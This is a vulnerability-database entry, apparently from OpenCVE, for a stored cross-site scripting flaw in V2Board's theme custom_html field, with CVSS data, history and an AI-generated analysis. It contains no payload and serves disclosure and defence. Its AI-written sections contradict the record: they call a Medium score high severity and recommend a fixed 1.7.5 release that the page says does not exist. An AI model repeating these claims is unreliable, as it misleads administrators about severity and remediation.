Description
Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing.
Published: 2026-05-01
Score: 6.9 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability resides in V2Board 1.7.4, where the custom_html field in theme configuration is rendered through Blade without escaping. An administrator can inject arbitrary JavaScript via the saveThemeConfig API, and because the payload is rendered unescaped on the public dashboard page, every site visitor who loads the dashboard will execute the malicious code. This allows the attacker to exfiltrate session cookies, hijack user sessions, or perform phishing attacks from the compromised site. The weakness is a classic Cross‑Site Scripting flaw, originating from improper output neutralisation.

Affected Systems

V2Board 1.7.4 and earlier versions are affected. The flaw lives in all installations that use the dashboard theme configuration API to store arbitrary HTML content.

Risk and Exploitability

The CVSS score of 6.9 classifies the issue as high severity. The EPSS score is unavailable, and the vulnerability is not currently listed in the CISA KEV catalog. Exploitation requires an authenticated administrator to inject the payload; however, once injected, every visitor to the dashboard page is impacted. This makes the vulnerability a moderate to high risk for sites with active administrative access, as attackers could compromise all users by first compromising or gaining access to an administrator account.

Generated by OpenCVE AI on May 2, 2026 at 08:00 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade V2Board to version 1.7.5 or later where the custom_html field is properly sanitized and escaped.
  • If an upgrade is not immediately possible, disable the custom_html field or configure the theme editor so that only pristine, trusted administrators can modify it.
  • Audit the existing custom_html field content and remove any embedded malicious scripts before disabling or upgrading to prevent lingering threats.

Generated by OpenCVE AI on May 2, 2026 at 08:00 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 02 May 2026 08:30:00 +0000

Type Values Removed Values Added
Title Cross‑Site Scripting via Unescaped Theme Configuration in V2Board 1.7.4

Fri, 01 May 2026 21:15:00 +0000

Type Values Removed Values Added
First Time appeared V2board
V2board v2board
Vendors & Products V2board
V2board v2board

Fri, 01 May 2026 20:15:00 +0000

Type Values Removed Values Added
Weaknesses CWE-79
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 01 May 2026 15:30:00 +0000

Type Values Removed Values Added
Description Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing.
References
Metrics cvssV3_1

{'score': 6.9, 'vector': 'CVSS:3.1/AC:L/AV:N/A:N/C:H/I:L/PR:H/S:C/UI:R'}

Subscriptions

V2board V2board
cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-01T19:46:08.026Z

Reserved: 2026-04-06T00:00:00.000Z

Link: CVE-2026-37503

cve-icon Vulnrichment

Updated: 2026-05-01T19:40:20.702Z

cve-icon NVD

Status : Received

Published: 2026-05-01T16:16:30.490

Modified: 2026-05-01T20:16:21.897

Link: CVE-2026-37503

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-02T08:15:16Z

Weaknesses